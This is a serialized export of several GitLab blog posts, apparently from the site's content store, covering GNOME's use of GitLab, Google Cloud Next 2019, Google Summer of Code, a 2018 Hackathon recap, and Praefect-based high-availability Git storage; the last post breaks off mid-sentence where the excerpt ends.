practices due to the move to GitLab, QA and wider community testing are still challenges for GNOME. 
(To be fair, GitLab's Global 2020 DevSecOps Survey found [QA/test remain challenging for everyone.](/developer-survey/)) Coordinating teams and members within a large free software project like GNOME is similar to doing so at a large commercial organization -- mostly around coordinating milestones and features spanning multiple teams. This means that GNOME has to hack around the limits of the GitLab Community Edition with homegrown tools.\n\nAnother big change to GNOME’s software development lifecycle is that there is now a closer relationship between designers and maintainers because there is more transparency on what the design team is doing.  \n\nThe move to GitLab has also shortened the cycle for developing [Flatpak](https://flatpak.org/), a software deployment and package management technology created by members of the GNOME community. The community can now automatically build Flatpak bundles and test changes against those instead of committing things to code. This shortens the feedback for QA, design, and releasing the software. \n\n### What do you think GitLab is doing well in supporting open source communities and what else would you like to see?\n\nOne of the things that GNOME appreciates most about GitLab is its transparency. It helps to know the roadmap and see what is being worked on in order to form proper expectations and plan ahead. \n\nGNOME is also happy that GitLab is continuing to grow its Developer Relations team and has invested in hiring an open source program manager. They are encouraged that GitLab now has a dedicated resource to understand the specific needs of open source communities on GitLab and craft a strategy to enable growth in this segment.\n\nUsing the Community Edition adds some challenges for open source communities since they often have to ask for features to be ported down. There are common features that are important to a lot of open source projects and communities and it is important to identify those and port them down. 
Having someone who can start conversations around these features is important. \n\nAnother area of opportunity for GitLab is to foster a closer relationship between the GitLab team and the community. GNOME would find it especially helpful to get to know GitLab engineers and product managers, in order to feel more comfortable collaborating with them. \n\nWhile there is more work to be done on this, GitLab is actively taking this feedback into account and is rolling out changes to the [GitLab forum](https://forum.gitlab.com/). Instead of being just a place to ask technical questions and find answers, there will soon be more of a social component as well.\n\n### What kind of organizations would you recommend GitLab for?\n\nLarge open source organizations that require coordination among various contributors will benefit from using GitLab. The project or organization doesn’t have to be super big, but when you have 20-40 people, or if your project is something that the industry depends on, GitLab is a great choice due to its features that enable project management, issue tracking, and CI for testing. \n\nAlso, if you’re into open source software, then GitLab is your best option from a feature to feature comparison. \n\n### What’s new at GNOME and what are some of the new things on the horizon?\n\nGNOME is continuing to invest in expanding its contributor base. Not only are they working on initiatives to improve and scale newcomer onboarding, but they are also hosting a [Community Engagement Challenge](https://www.gnome.org/news/2019/08/gnome-foundation-launches-coding-education-challenge/), along with Endless, to get a younger generation into open source. The Challenge has multiple stages and includes over $65,000 USD in cash and prizes. Phase One winners were recently announced at this year’s [GUADEC](https://events.gnome.org/event/1/), GNOME’s annual core conference. \n\nThis year’s GUADEC was done remotely due to the pandemic and was a huge success! 
If you missed it, be sure to check out the [GUADEC YouTube channel](https://www.youtube.com/user/GUADEC/) for videos of the talks. Coming soon will be the annual [GNOME.Asia Summit](https://www.gnome.asia/), and the [Linux App Summit](https://linuxappsummit.org/), which will be co-hosted again with [KDE](https://kde.org/). GNOME also hopes to hold a first-ever Pan African GNOME Summit (PAGS) in the upcoming year. \n\nFrom a technical standpoint, GNOME is trying to remove their over-reliance on mailing lists by using GitLab projects instead. The release team now makes “freeze break” requests in a GitLab project, and the security team uses a web form that opens a confidential issue in a GitLab project through the GitLab Service Desk feature.\n\nAfter enthusiastically adopting CI pipelines, GNOME projects are now trying to optimize their workflows to minimise time spent, bandwidth, and energy consumption.\n\nLast but not least, some GNOME members are working on implementing community health metrics in order to evolve into a more data-driven organization. The [App Ecosystem working group at CHAOSS](https://chaoss.community/participate/) was founded earlier this year as a result, and includes members from GNOME and KDE, among others. 
New members are encouraged to join!\n\n",[267,9,708],{"slug":2778,"featured":6,"template":689},"gnome-follow-up","content:en-us:blog:gnome-follow-up.yml","Gnome Follow Up","en-us/blog/gnome-follow-up.yml","en-us/blog/gnome-follow-up",{"_path":2784,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2785,"content":2791,"config":2797,"_id":2799,"_type":14,"title":2800,"_source":16,"_file":2801,"_stem":2802,"_extension":19},"/en-us/blog/google-next-post",{"title":2786,"description":2787,"ogTitle":2786,"ogDescription":2787,"noIndex":6,"ogImage":2788,"ogUrl":2789,"ogSiteName":673,"ogType":674,"canonicalUrls":2789,"schema":2790},"What to check out at Google Cloud Next 2019","Support women who code by stopping by our booth, learn from a host of GitLab experts, and more.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679235/Blog/Hero%20Images/cloud-native-predictions-2019.jpg","https://about.gitlab.com/blog/google-next-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What to check out at Google Cloud Next 2019\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Mayank Tahilramani\"}],\n        \"datePublished\": \"2019-04-04\",\n      }",{"title":2786,"description":2787,"authors":2792,"heroImage":2788,"date":2794,"body":2795,"category":299,"tags":2796},[2793],"Mayank Tahilramani","2019-04-04","\n\nIt’s that time of the year to indulge in all things innovative and new at Google Cloud Next 2019.\nAs an attendee last year, I was excited to learn about Google’s vision on ‘bringing the cloud to you’\nwith a focus on hybrid cloud and unveiling of GKE On-Prem. 
GitLab’s partnership with Google\nhas grown a lot since we launched our quick and easy [integration with GKE](/partners/technology-partners/google-cloud-platform/)\nlast year and we hope you will come out to see some of the new things we have going on.\n\n### Don't be shy, come say hi 👋\n\nCome visit us at our booth (#S1607), get scanned, and GitLab will donate $5 to your\ncharity of choice: [Rail Girls](http://railsgirls.com/) or [Django Girls](https://djangogirls.org/).\nThis also enters you for a chance to win an iPad Pro!\n\nWhile you're there, we would love to showcase and talk about:\n\n* GitLab’s [AutoDevOps](https://docs.gitlab.com/ee/topics/autodevops/) functionality.\n* Using GitLab to [secure your applications](/stages-devops-lifecycle/secure/).\n* How to get started with [GitLab for GCP on GKE](/partners/technology-partners/google-cloud-platform/) and GKE On-Prem.\n* GitLab [Serverless with Knative](/topics/serverless/) and [Cloud Run](https://cloud.google.com/blog/products/serverless/announcing-cloud-run-the-newest-member-of-our-serverless-compute-stack),\n* ... and much more!\n\n### Sit back, relax, and listen to some of our experts live\n\n* Check out [Brandon Jung](/company/team/#brandoncjung) (VP of Alliances) discuss [GitLab’s move from Azure to GCP](https://cloud.withgoogle.com/next/sf/sessions?session=ARC207) which includes a technical\noverview of the migration as well as lessons learned. Check out our customer case study [here](https://cloud.google.com/customers/gitlab/).\n\n* Come listen to [Kathy Wang](/company/team/#wangkathy) (Senior Director of Security) tell our journey [Towards Zero Trust at GitLab.com](https://cloud.withgoogle.com/next/sf/sessions?session=SEC220) along with key lessons learned. 
([You can read more about the evolution of Zero Trust here](/blog/evolution-of-zero-trust/).)\n\n* Learn something new with [Daniel Gruesso](/company/team/#danielgruesso) (Product Manager) showcasing GitLab’s serverless functionality to [Run a consistent serverless platform anywhere with Kubernetes and Knative](https://cloud.withgoogle.com/next/sf/sessions?session=HYB218).\n\n### Get hands on with Qwiklabs\n\nLearn from [Dan Gordon](/company/team/#dbgordon) (Senior Technical Marketing Manager) at our [Spotlight Lab: Introduction to GitLab on GKE](https://cloud.withgoogle.com/next/sf/sessions?session=301353-133371). Here you will have the chance to deploy GitLab on GKE, migrate a GitHub repository into a GitLab Project, and set up a CI/CD pipeline with AutoDevOps to deploy your code to GKE.\n\nSo stop by and say hello!\n\nWe are proud to be a sponsor at this event and would love to see as many of you at our booth (S1607) to discuss GitLab [Serverless](/topics/serverless/) with Knative and Cloud Run, GitLab’s integration with GKE, GitLab AutoDevOps for CI/CD, Security functionalities, as well as GitLab’s support for GKE On-Prem.\n",[909,1038,109,685,231,9,865,953],{"slug":2798,"featured":6,"template":689},"google-next-post","content:en-us:blog:google-next-post.yml","Google Next Post","en-us/blog/google-next-post.yml","en-us/blog/google-next-post",{"_path":2804,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2805,"content":2810,"config":2816,"_id":2818,"_type":14,"title":2819,"_source":16,"_file":2820,"_stem":2821,"_extension":19},"/en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare",{"title":2806,"description":2807,"ogTitle":2806,"ogDescription":2807,"noIndex":6,"ogImage":1733,"ogUrl":2808,"ogSiteName":673,"ogType":674,"canonicalUrls":2808,"schema":2809},"Google Summer of Code 2024: Contribute to GitLab and Git to prepare","Learning how to contribute to GitLab and Git can help you get ready to apply for Google's program for open source 
development.","https://about.gitlab.com/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Google Summer of Code 2024: Contribute to GitLab and Git to prepare\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nick Veenhof\"},{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2023-12-20\",\n      }",{"title":2806,"description":2807,"authors":2811,"heroImage":1733,"date":2813,"body":2814,"category":10,"tags":2815},[2812,1492],"Nick Veenhof","2023-12-20","Google Summer of Code ([GSoC](https://summerofcode.withgoogle.com/)), a program that helps bring new contributors into open source software development, is just around the corner. So now is the time to start learning [how to contribute to GitLab](https://about.gitlab.com/community/contribute/) or Git and prepare ideas for GSOC 2024. GitLab has participated in GSOC for more than five years of the program's 20-year history, and the mentorship opportunity aligns well with our \"[Everyone can contribute](https://handbook.gitlab.com/handbook/company/mission/)\" mission.\n\nIn 2023, GitLab team members mentored GSoC contributors working on GitLab and Git open source projects throughout the 12-week program. One example was the “Unify ref-filter formats with other --pretty formats” Git project. \n\n## Implementing new formatting options for Git commands\n\nKousik Sanagavarapu was selected as a 2023 GSOC contributor and was mentored by [Christian Couder](https://gitlab.com/chriscool), staff backend engineer on the GitLab Gitaly::Git team.\n\nKousik’s work focused on implementing some [new formatting options for Git commands](https://summerofcode.withgoogle.com/programs/2023/projects/rck3kmq2) like `git branch`, `git tag` and `git for-each-ref`. These commands use a formatting mechanism called the “ref-filter” format. 
The formatting options Kousik worked on were already available for other commands like `git log`, that use a different formatting mechanism called the “pretty” format. So the work involved porting these options from the “pretty” format to the “ref-filter” format.\n\nThanks to Kousik’s work, it’s now possible to use a number of new placeholders like %(signature), %(authoremail:mailmap), or %(describe) in the –format option of `git branch`, `git tag`, and `git for-each-ref` to get more information about the commits that branches, tags, or refs in general point to. [Read the documentation](https://git-scm.com/docs/git-for-each-ref/2.43.0#_field_names) for a description of these placeholders.\n\nThese improvements are available in the recently released Git 2.43.\n\n## How GSOC works\n\nOpen source organizations who participate – such as GitLab and Git – have to propose projects and provide mentors. Selected contributors are helped by the mentors and paid by Google during 12 or more weeks while they work on their projects. Contributors are evaluated three times by mentors: after a “Community Bonding” period, in the middle of the coding period, and after the coding period for a final evaluation.  \n\n## How to participate as a contributor\n\nTo apply to become a contributor for GSOC 2024, check out the [GSoC website](https://summerofcode.withgoogle.com/) and the [Google Open Source blog](https://opensource.googleblog.com). Interested parties should register [when selected organizations are announced](https://opensource.googleblog.com/2023/02/mentor-organizations-announced-for.html), which will happen in a few months. 
\n\nContributors will then be selected by the mentors after they have made a small contribution and after they have prepared an application document that details how they plan to achieve the proposed project they want to work on.\n\nProspective contributors can start learning about GitLab or Git right now to be fully ready to make a small contribution and prepare an application. [As Google says](https://opensource.googleblog.com/2023/02/mentor-organizations-announced-for.html), “The most successful applications come from contributors who start preparing now.” \n\nGitLab has a lot of documentation and tutorials [to learn how to contribute](https://about.gitlab.com/community/contribute/), while Git has a [Hacking Git page](https://git.github.io/Hacking-Git/) with a lot of helpful links.\n\n## How GitLab team members participate\n\nGitLab participates in GSOC as an open source organization and team members from different functional areas volunteer to mentor contributors and propose projects for them to work on.  \n\nIn 2023, GitLab team members mentored contributors on a number of GitLab-related projects, including  Pajamas Migration with the GitLab Foundations Team and improving the documentation for the contributor journey to GitLab.\n\n## How Git developers participate\n\nThe Git project also participates in GSoC as an open source organization, and Git developers who are interested in mentoring propose projects, and then select GSoC contributors.\n\nLast summer, in addition to the \"Unify ref-filter formats with other --pretty formats\" project, Git developers proposed the \"[More Sparse Index integrations](https://summerofcode.withgoogle.com/programs/2023/projects/Rkbc1Abe)\" project.\n\n## Mentoring and GitLab \n\nGitLab’s mission is “Everyone can contribute” and we understand that helping potential contributors through mentoring can achieve this goal. 
In addition to participating in external programs like GSOC and [Outreachy](https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020/), GitLab has internal mentoring programs, including a [CEO Shadow program](https://handbook.gitlab.com/handbook/ceo/shadow/) and a [Mentorship program for women](https://handbook.gitlab.com/handbook/company/culture/inclusion/tmrg-gitlab-women/mentorship-program/).\n\nLearn more about [mentoring at GitLab](https://handbook.gitlab.com/handbook/people-group/learning-and-development/mentor/).",[9,267,708,751,779],{"slug":2817,"featured":6,"template":689},"google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare","content:en-us:blog:google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare.yml","Google Summer Of Code 2024 Contribute To Gitlab And Git To Prepare","en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare.yml","en-us/blog/google-summer-of-code-2024-contribute-to-gitlab-and-git-to-prepare",{"_path":2823,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2824,"content":2830,"config":2836,"_id":2838,"_type":14,"title":2839,"_source":16,"_file":2840,"_stem":2841,"_extension":19},"/en-us/blog/gsoc-at-gitlab",{"title":2825,"description":2826,"ogTitle":2825,"ogDescription":2826,"noIndex":6,"ogImage":2827,"ogUrl":2828,"ogSiteName":673,"ogType":674,"canonicalUrls":2828,"schema":2829},"Google Summer of Code at GitLab – some intern highlights","GitLab team members mentored student interns and helped them develop open source projects during Google Summer of Code.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682129/Blog/Hero%20Images/gsoc_cover.jpg","https://about.gitlab.com/blog/gsoc-at-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Google Summer of Code at GitLab – some intern highlights\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aakriti Gupta\"}],\n        
\"datePublished\": \"2021-09-01\",\n      }",{"title":2825,"description":2826,"authors":2831,"heroImage":2827,"date":2833,"body":2834,"category":299,"tags":2835},[2832],"Aakriti Gupta","2021-09-01","\n\nGitLab participated in [Google Summer of Code](https://summerofcode.withgoogle.com/) for the first time this year. We hosted four student interns to work with us on four different projects under the supervision of two or three mentors each.\n\nFor the past 16 years, Google has hosted the Summer of Code to introduce students to the world of open source. Over the summer, student interns work on a project with an open source organization and are closely mentored by the developers of the open source project. More than [200 organizations](https://summerofcode.withgoogle.com/organizations/) participated this year.\n\nWe started off the summer with a two-week long community bonding period to get our students familiar with how we work at GitLab and helped them set-up their local development environments. During the 10-week program we worked through scoped projects with regular check-ins and [a final demo](https://youtu.be/--Neg5pwwnI) to conclude the program.\n\n## Meet the students\n\n### Alejandro Rusi\n[Alejandro](https://gitlab.com/rusi-ruse), a CS student from Argentina, worked on [enabling Courseware as Code](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-gsoc-2021/-/issues/4) through his project. Check out his [video presentation here](https://youtu.be/qgQQ4MgnKR4) and read [more about the project here](https://alejandro-rusi.gitlab.io/2021/05/31/toward-courseware). Alejandro said:  \n\n> They quickly made me feel welcome and part of Gitlab. 
All of the topics to choose from were very interesting, and all mentors seemed great.\n>\n> I would like to highlight a moment during GSoC where I wasn't able to do my normal workload due to a personal problem, and my mentors where incredibly supportive and understanding.\n\n### Anshuman Singh\n\n[Anshuman](https://gitlab.com/singhanshuman), a CS student who joined us from India, collaborated with the Static Analysis team to work on [writing vulnerability detection rules  for SAST](https://gitlab.com/groups/gitlab-org/-/epics/6089). Anshuman said: \n\n> For a beginner, it is normal to feel insecure about achieving specified tasks in your group.\n>\n> I am glad that my mentors Julian and Ross were there at every step of the program to provide support and clear my doubts about anything. It was such an enriching experience for me. I am glad to be the part of GitLab for this Google Summer of Code edition. :)\n\n### Cyrine Gamoudi\n\nA computer engineering student from Tunisia, [Cyrine](https://gitlab.com/CyrineG1) worked with the Static Analysis team on [porting SAST and Secret Detection rails platform code to GitLab CE](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-gsoc-2021/-/issues/6).\n\n> The project went very smoothly. I was able to achieve almost all of the planned milestones and I'm currently still in contact with my mentors, working on what was left. I enjoyed getting an inside look into how open source projects are maintained as well as how they evolve through time. It was also interesting to see the impact of historical architectural decisions on what could and could not be done later on.\n\n### Shubham Kumar\n\nNow in his final year of schooling, [Shubham](https://gitlab.com/imskr) from India helped the Geo team [improve our backup and restore features](https://shubhamkumar.live/blog/Improving-Backup-and-Restore-For-GitLab-GSoC-2021/).\n\n> Mentorship was amazing. Mentors helped me a lot whenever I had problem. 
Contributing to GitLab is very welcoming. I absolutely loved it.\n\n## GitLab mentors share their thoughts \n\n### What went well?\n\n- External organization\n  - The folks at Google were well organized, the entire schedule was available right at the beginning and the reminder emails were very informative and well timed.\n  - We used it to create our own calendar and that was very helpful.\n- Asynchronous working style\n\n> Having recorded meetings and an agenda doc was really helpful, especially for cases where one mentor went on holidays it was easy to catch up on things. Writing up a planning epic with our student Anshuman was really helpful to make sure that we were on the same page and to clearly define the project deliverables. - [Julian Thome](/company/team/#julianthome), senior vulnerability research engineer at GitLab. \n>\n> Related to this, GitLab's default mode of working that favors asynchronous communication and the written form feels very well-aligned with GSoC and working across time zones. Even without a large amount of overlap between working for myself and our mentee, it felt very effective and like we had a strong foundation in place to support communication and workflows (just point to our existing handbook and docs). - [Lucas Charles](/company/team/#theoretick), staff backend engineer, Secure, at GitLab.\n\n  - It was really useful to have two mentors on the project. This way it was easier sharing responsibilities and managing other priorities, especially when one mentor was out.\n\n### What could be improved? 
\n\n- We had considerable engagement on the project proposal issues but not as many applications.\n- GitLab is huge and has a complex object model for students to hold onto.\n- Running GitLab locally requires a lot of resources.\n- The fork contribution model wasn't efficient for some projects.\n\n\n- Define the required skills for the project better\n> Since GSoC is 10 short weeks, making sure that the student has acquired all the required skills for the project before it starts would have allowed us to reduce the overall mentoring workload and to use mentoring time more efficiently by focusing on the project objectives. Next year, we can make better use of the \"Community Bonding\" period by giving the students more guidance and some time upfront to learn the required technologies/languages so that they are fully prepared before the coding phase begins. -  Julian\n\n- A clear \"victory task,\" possibly in the frontend, would have made some of the projects more \"visible\" and would have felt more complete.\n\n## Wrapping up\n\n[Tetiana Chupryna](/company/team/#brytannia), senior backend engineer, Secure, at GitLab sums up the experience of the mentors really well: \n\n> This program gave me a feeling of deep fulfilment as I was able to look at GitLab through the eyes of a community contributor and I hope that this project was useful for our student in her career, and she will return to GitLab one day as a contributor (we were lucky to have her on this project). 
So it was a summer well spent 🍎.\n\nWe hope GitLab can be back at Google Summer of Code next year!\n\n[Cover image](https://unsplash.com/photos/7RQf2X6aXXI) by [Raphaël Biscaldi](https://unsplash.com/@les_photos_de_raph)\n{: .note}\n\n",[267,708,780,9,2660],{"slug":2837,"featured":6,"template":689},"gsoc-at-gitlab","content:en-us:blog:gsoc-at-gitlab.yml","Gsoc At Gitlab","en-us/blog/gsoc-at-gitlab.yml","en-us/blog/gsoc-at-gitlab",{"_path":2843,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2844,"content":2849,"config":2854,"_id":2856,"_type":14,"title":2857,"_source":16,"_file":2858,"_stem":2859,"_extension":19},"/en-us/blog/hackathon-recap",{"title":2845,"description":2846,"ogTitle":2845,"ogDescription":2846,"noIndex":6,"ogImage":1348,"ogUrl":2847,"ogSiteName":673,"ogType":674,"canonicalUrls":2847,"schema":2848},"Recapping the first GitLab Hackathon","What we accomplished and learned from the Hackathon on September 27-28.","https://about.gitlab.com/blog/hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Recapping the first GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-09\",\n      }",{"title":2845,"description":2846,"authors":2850,"heroImage":1348,"date":2851,"body":2852,"category":10,"tags":2853},[704],"2018-10-09","\n\nWhen we wrapped up our first Hackathon on September 28th, I was impressed both\nwith the energy from participants (including many first-time contributors) and\nwhat the GitLab community accomplished over two days.\n\n## So what did we accomplish?\n\nOne of the key goals of the event was to encourage community members to contribute\nMerge Requests (MRs), and the community delivered more than 20 MRs, with 15 of\nthem merged as of October 8th. 
You can see the list of MRs at the\n[Hackathon Community MRs page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/4).\nThis is pretty impressive when you consider that community members had less than\n2 weeks' notice for the event.\n\n## What else happened during the event?\n\nIn addition to hacking, we had several community experts deliver tutorial\nsessions on topics ranging from\n[GitLab Development Kit](https://www.youtube.com/watch?v=gxn-0KSfNaU),\n[documentation](https://www.youtube.com/watch?v=8GT2XOkpSi4&feature=youtu.be),\n[internationalization/translation](https://www.youtube.com/watch?v=LJ9oSSx0qyY&feature=youtu.be),\n[UX design](https://www.youtube.com/watch?v=q_nq5OCiktE&feature=youtu.be), and\n[Merge Request Coaches](https://www.youtube.com/watch?v=daCFv9tAQXw&feature=youtu.be).\nRecordings/slides from all the sessions can also be found on the [Hackathon wiki page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon).\nWe also identified a number of issues/bugs as listed on the [wiki](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/wikis/Q3%272018-hackathon#issuesbugs-found-during-the-hackathon),\nand we will certainly be following up on these.\n\n## Will there be another Hackathon event in the future?\n\nOur plan is to have a Hackathon event every quarter, and I'm excited to announce\nthat the Q4 Hackathon will take place on November 14-15. Stay tuned for further\nannouncements in another blog post and discussions on the\n[GitLab Community room in Gitter](https://gitter.im/gitlabhq/community)\nand on the [GitLab forum](https://forum.gitlab.com/). 
In addition,\nif you have any suggestions for topics and/or feedback on last month's event,\nplease mention them on the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community)\nto help us improve future Hackathons.\n\n## Hackathon prizes\n\nAs we announced at the Hackathon kickoff, everyone who had MRs merged will\nreceive a token of our appreciation so they can purchase GitLab merchandise at\nthe [GitLab store](https://shop.gitlab.com/). During the Hackathon period,\neight people had MRs merged and the \"grand prize\" winner with most MRs merged is\n[George Tsiolis](https://gitlab.com/gtsiolis) with seven merged MRs!\nCongratulations to everyone! I will reach out to all winners shortly.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":2855,"featured":6,"template":689},"hackathon-recap","content:en-us:blog:hackathon-recap.yml","Hackathon Recap","en-us/blog/hackathon-recap.yml","en-us/blog/hackathon-recap",{"_path":2861,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2862,"content":2868,"config":2874,"_id":2876,"_type":14,"title":2877,"_source":16,"_file":2878,"_stem":2879,"_extension":19},"/en-us/blog/high-availability-git-storage-with-praefect",{"title":2863,"description":2864,"ogTitle":2863,"ogDescription":2864,"noIndex":6,"ogImage":2865,"ogUrl":2866,"ogSiteName":673,"ogType":674,"canonicalUrls":2866,"schema":2867},"Meet Praefect: The traffic manager making your Git data highly available","This router and transaction manager ensures there are multiple copies of each Git repository available in 
the event of an outage – no NFS required.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669204/Blog/Hero%20Images/traffic-intersection.jpg","https://about.gitlab.com/blog/high-availability-git-storage-with-praefect","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet Praefect: The traffic manager making your Git data highly available\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Zeger-Jan van de Weg\"}],\n        \"datePublished\": \"2021-01-21\",\n      }",{"title":2863,"description":2864,"authors":2869,"heroImage":2865,"date":2871,"body":2872,"category":801,"tags":2873},[2870],"Zeger-Jan van de Weg","2021-01-21","\nAs critical software projects grow, scaling infrastructure to make the service [highly available](https://en.wikipedia.org/wiki/High_availability) is key. At GitLab, our biggest struggle in scaling was right in our name: Git.\n\n## The trouble with scaling Git\n\nGit is software that is distributed, but not usually run in a ‘highly available cluster,’ which is what GitLab needs. At first, we solved this with a [boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions), NFS – which exposes a shared filesystem across multiple machines and generally worked. As we’d soon find out, most NFS appliances were for bulk storage and not fast enough. This led to problems with GitLab’s Git access being slow.\n\nTo solve the speed problem we built [Gitaly, our service that provides high-level RPC access to Git repositories](https://docs.gitlab.com/ee/administration/gitaly/). \n\nWhen we started with [Gitaly v1.0](/blog/the-road-to-gitaly-1-0/), our goal was to remove the need for a network-attached filesystem access for Git data. When that was complete, the next problem to tackle was that all your data is only stored once. 
So, if you have a server down, or your hard disk dies, or something happens to this one copy, you're in deep trouble until a backup is restored. This is an issue for GitLab.com, but it’s also a big risk for our customers and community.\n\nBack at our [Summit in Cape Town](/company/culture/contribute/previous/#summit-in-cape-town-south-africa) in 2018, the Gitaly team (at the time, that was [Jacob Vosmaer](/company/team/?department=all#jacobvosmaer-gitlab) and me) and some other engineers discussed pursuing a fault-tolerant, highly available system for Git data. For about a month we went back and forth about how we would go about it – ranging from wild ideas to smaller iterations towards what we want. The challenge here was that the ultimate aim is always going to be 100% availability, but you’re never going to make that. So let's aim for a lot of nines (three nines being 99.9%, five being 99.999%, etc.) Ideally, we'd be able to iterate to 10 nines if we wanted to. \n\nEventually we chose the design of a proxy: introduce a new component in the GitLab architecture, which is Praefect, and then route all the traffic through it to Gitaly storage nodes to provide a [Gitaly Cluster](https://docs.gitlab.com/ee/administration/gitaly/praefect.html). Praefect inspects the request and tries to route it to the right Gitaly backend, checks that Gitaly is up, makes sure the copies of your data are up to date, and so on. \n\n## First iteration: Eventual consistency\n\nTo cut the scope, for our first iterations we settled on eventual consistency, which is fairly common – we even use it for some GitLab features. With Git data, if we are behind a minute, it's not a big deal because at GitLab at least 90% of operations on our Git data are just reads, compared to a very small volume of writes. If I run `git pull` and I'm one commit behind master, that's not ideal, but not a deal breaker in most cases. 
\n\nWith eventual consistency, each repository gets three copies: one primary and two secondary. We replicate your data from the primary to the other copies, so that if your primary is inaccessible, we can at least give you read access to the secondary copies until we recover the primary. There’s a chance the secondaries are one or two commits behind your primary, but it’s better than no access.\n\nWe rolled this out in [13.0](/releases/2020/05/22/gitlab-13-0-released/#gitaly-cluster-for-high-availability-git-storage) as generally available. \n\n## Strong consistency\n\nThe next stage was to work on strong consistency, where all of your three copies are always up to date. \n\nWhen you write to your Git repository, there’s a moment where Praefect says, “OK, I'm going to update branch A from #abc to #cbd.” If all three copies agree on the updates, then Praefect tells everyone to apply this update and now, almost at the same moment in time, they'll update the data to the same thing. Now you've got three copies that are up to date.\n\nSo, if one copy is offline for some reason – let’s say a network partition, or the disk is corrupted – we can serve from the other two copies. Then the data remains available, and you have more time to recover the third copy as an admin. Effectively, while you always have a designated primary, it's actually more like having _three_ primaries, because they are all in the same state. \n\nIf the default state of a system is consistent it requires maintaining this consistency on each mutation to the data that's performed. All possible requests to Gitaly are grouped into two classes: mutators and accessors. Meaning that there was a risk we had to migrate each mutator RPC individually. That would've been a major effort, and if possible, we wanted to push this problem to Git. 
Gitaly uses Git for the majority of write operations, and was thus the largest common denominator.\n\nSo Git had to become aware of transactions, which ideally isn't part of Git. There are more areas where it would be nice if Git was aware of business logic, but if we're honest with ourselves, it's not really Git's concern: authentication and authorization. At GitLab we use [Git Hooks](https://git-scm.com/docs/githooks.html#_hooks) for that. So the idea [applied and contributed](https://public-inbox.org/git/1de96b96e3448c8f7e7974f7c082fd08d2d14e96.1592475610.git.ps@pks.im/T/#m9ae42f583968aa1d8ca43bd3007333cf51a618cc) (thanks, [Patrick Steinhardt](/company/team/#pks-gitlab)!) was the same: when events happen with Git, execute a hook and allow Gitaly to execute business logic. Through the exit code of the hook, Git is signaled on how to proceed. In Git, these events are updates of any reference (for example, branches or tags). When this happens Git will then allow Gitaly to participate in a [three-phase commit](https://en.wikipedia.org/wiki/Three-phase_commit_protocol) transaction by communicating back to Praefect, and enforce consistency. So we got that released in Git, fixed a bug, and now we’re [rolling it out to almost all write requests](https://gitlab.com/gitlab-org/git/-/issues/79).\n\n## A defensible cost increase\n\nNow strong consistency is great, but we are effectively asking our customers, “Instead of one copy, why don't you triple your storage costs and your server costs and whatnot, and you have zero benefits unless something goes wrong.” That wasn't really appealing for most customers, but now we’ve sweetened the deal with increased performance and making the cost increase more manageable. \n\nSo, if you have three copies of your data that are up to date, then all of them could serve any request that doesn't mutate the data, right? Because you know they're up to date. 
Right now, [Pavlo](/company/team/?department=gitaly-team#8bitlife) is working on [read distribution, which we are making generally available in 13.8](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/71960) (coming Jan. 22, 2021). [We rolled it out briefly before](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/58694), but it didn’t scale as expected, so we’ve worked with QA to mitigate that.\n\nRight now, Praefect is rolled out to a very limited subset of projects on GitLab.com, because running it is expensive already. When I first proposed rolling it out for everyone, it was very quick to calculate that that will triple our Gitaly Clusters – not within the budget at all! So we're trying to iterate towards that goal. The first step is to work on allowing a [variable replication factor](https://docs.gitlab.com/ee/administration/gitaly/praefect.html#variable-replication-factor). It can be expensive to store a lot of data multiple times, so why don't we make it so that you can store some repositories three times and some just one time, and you don't get the guarantees and the availability of those with three copies.\n\n## Challenges and lessons learned\n\nSo we have Praefect, this new component, but it's not installed by default on GitLab Omnibus –\nyou have to enable it yourself. The [GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit) uses it as well as the tests on GitLab.com, for GitLab projects, but 